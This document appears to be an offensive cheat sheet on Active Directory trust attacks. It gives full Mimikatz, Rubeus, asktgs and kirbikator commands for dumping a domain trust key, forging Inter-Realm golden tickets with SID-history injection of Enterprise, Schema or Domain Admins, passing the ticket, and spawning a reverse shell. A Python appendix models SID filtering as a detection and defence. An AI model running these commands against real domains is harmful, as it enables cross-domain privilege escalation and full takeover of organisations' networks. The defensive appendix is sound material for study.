TRUST BASED DOMAIN ATTACKS

USING TRUST KEY

We need Domain Admin privileges in the current domain to extract the trust key and perform attacks across a domain trust

To get the domain trust key using Mimikatz

Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Create an Inter-Realm TGT for the target domain (the /sids value injects the target domain's group SID into SID history)

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ATTACKER DOMAIN NAME> /sid:<ATTACKER DOMAIN SID> /sids:<TARGET DOMAIN SID>-<RID> /rc4:<TRUST KEY> /service:krbtgt /target:<TARGET DOMAIN NAME> /ticket:<TICKET PATH>"'

The RID selects which group of the target domain is claimed in SID history. Some important RIDs are,

  • Enterprise Admins - 519

  • Schema Admins - 518

  • Domain Admins - 512

Requesting a TGS for the target domain's DC from the target domain, using the Inter-Realm TGT

.\asktgs.exe <PATH TO TGT> CIFS/<TARGET DOMAIN>

Presenting the TGS to the service

.\kirbikator.exe lsa <TGS PATH>

Or we can use Rubeus to request the TGS from the Inter-Realm TGT and inject it in one step

.\Rubeus.exe asktgs /ticket:<TRUST TGT> /service:cifs/<TARGET DOMAIN NAME> /dc:<DC OF TARGET DOMAIN> /ptt

USING KRBTGT HASH

Instead of the domain trust key, the krbtgt hash of the current domain is used to forge the Inter-Realm TGT

Create an Inter-Realm TGT for the target domain (note the parameter is /krbtgt, not /rc4, when the krbtgt NTLM hash is supplied)

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ATTACKER DOMAIN NAME> /sid:<ATTACKER DOMAIN SID> /sids:<TARGET DOMAIN SID>-<RID> /krbtgt:<KRBTGT NTLM> /service:krbtgt /target:<TARGET DOMAIN NAME> /ticket:<TICKET PATH>"'

Executing a Pass The Ticket attack with the saved TGT

Invoke-Mimikatz -Command '"kerberos::ptt <TGT PATH>"'

Try running WMI queries against the target; if the WMI query output displays, the ticket is being accepted

The HOST service can be used as well, instead of CIFS

Try spawning a reverse shell via scheduled tasks
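Both procedures above (trust key and krbtgt hash) rely on the same thing: the target domain honouring a SID from its own SID range (<TARGET DOMAIN SID>-512/518/519) that arrives in the SID history of a ticket issued by another domain. The defence is SID filtering on the trust (quarantine), which drops every SID history entry not owned by the domain that issued the ticket. The following is an added example, not code from this page, that models that filtering decision and flags the forged privileged-group claims; all SIDs in it are constructed sample values, and the function and constant names are this example's own.

```python
"""Model of SID filtering on a trust boundary (added example, not from the original page).

A forged Inter-Realm TGT carries extra SIDs of the form <TARGET DOMAIN SID>-<RID>.
With SID filtering (quarantine) enabled on the trust, the trusting (target) domain keeps
only SID history entries owned by the trusted (issuing) domain; a claim of membership in
the target domain's own Domain Admins (512), Schema Admins (518) or Enterprise Admins
(519) is exactly what gets dropped, and is the event a defender wants to alert on.
Intra-forest (parent/child) trusts do not filter by default, which is why the attack
works there: pass sid_filtering=False to see the unfiltered result.
"""
import re
from dataclasses import dataclass
from typing import List

# Well-known RIDs listed on the page; these are the payload of the forged ticket.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

# Domain SID is S-1-5-21-<a>-<b>-<c>; an account or group SID appends one RID component.
ACCOUNT_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# Constructed sample values (hypothetical domains, not real identifiers).
SAMPLE_TRUSTED_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # issuing/attacker domain
SAMPLE_TRUSTING_DOMAIN_SID = "S-1-5-21-4444444444-5555555555-6666666666"  # target domain
SAMPLE_EXTRA_SIDS = [
    SAMPLE_TRUSTING_DOMAIN_SID + "-519",   # forged: Enterprise Admins of the target domain
    SAMPLE_TRUSTED_DOMAIN_SID + "-1105",   # legitimate: a group of the issuing domain
]


def split_sid(sid: str):
    """Return (domain_sid, rid) for an account/group SID; raise ValueError otherwise."""
    m = ACCOUNT_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account/group SID: {sid}")
    return m.group(1), int(m.group(2))


@dataclass
class SidDecision:
    sid: str
    filtered: bool   # True: dropped by SID filtering at the trust boundary
    severity: str    # "info", "medium" or "high"
    reason: str


def evaluate_sid_history(extra_sids: List[str], trusted_domain_sid: str,
                         trusting_domain_sid: str) -> List[SidDecision]:
    """Decide, per SID history entry, what quarantine-style SID filtering would do."""
    decisions = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain == trusted_domain_sid:
            # The issuing domain may legitimately assert its own groups.
            decisions.append(SidDecision(sid, False, "info", "owned by the trusted domain"))
        elif domain == trusting_domain_sid and rid in PRIVILEGED_RIDS:
            # The target domain's own privileged group, asserted from outside: forged claim.
            decisions.append(SidDecision(sid, True, "high",
                f"claims {PRIVILEGED_RIDS[rid]} (RID {rid}) of the trusting domain itself"))
        elif domain == trusting_domain_sid:
            decisions.append(SidDecision(sid, True, "medium",
                f"claims RID {rid} of the trusting domain itself"))
        else:
            decisions.append(SidDecision(sid, True, "medium", "SID from an unrelated domain"))
    return decisions


def effective_sids(extra_sids: List[str], trusted_domain_sid: str,
                   trusting_domain_sid: str, sid_filtering: bool = True) -> List[str]:
    """SIDs the trusting domain would actually honour from the ticket's SID history."""
    if not sid_filtering:
        return list(extra_sids)  # default for intra-forest trusts: everything is accepted
    decisions = evaluate_sid_history(extra_sids, trusted_domain_sid, trusting_domain_sid)
    return [d.sid for d in decisions if not d.filtered]


def should_alert(decisions: List[SidDecision]) -> bool:
    """True when a filtered SID is a privileged-group claim against the trusting domain."""
    return any(d.severity == "high" for d in decisions)


if __name__ == "__main__":
    result = evaluate_sid_history(SAMPLE_EXTRA_SIDS, SAMPLE_TRUSTED_DOMAIN_SID,
                                  SAMPLE_TRUSTING_DOMAIN_SID)
    for d in result:
        print(f"{'FILTERED' if d.filtered else 'kept    '} [{d.severity:6}] {d.sid}: {d.reason}")
    print("alert:", should_alert(result))
    print("honoured without filtering:",
          effective_sids(SAMPLE_EXTRA_SIDS, SAMPLE_TRUSTED_DOMAIN_SID,
                         SAMPLE_TRUSTING_DOMAIN_SID, sid_filtering=False))
```

The two runs of effective_sids show the whole point of the mitigation: with filtering off (the intra-forest default) the forged -519 entry is honoured and the ticket holder is treated as an Enterprise Admin; with quarantine on the trust, only the issuing domain's own -1105 group survives. In production the same observation appears as a filtered-SID event on the trusting domain's DC rather than as this script's output.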
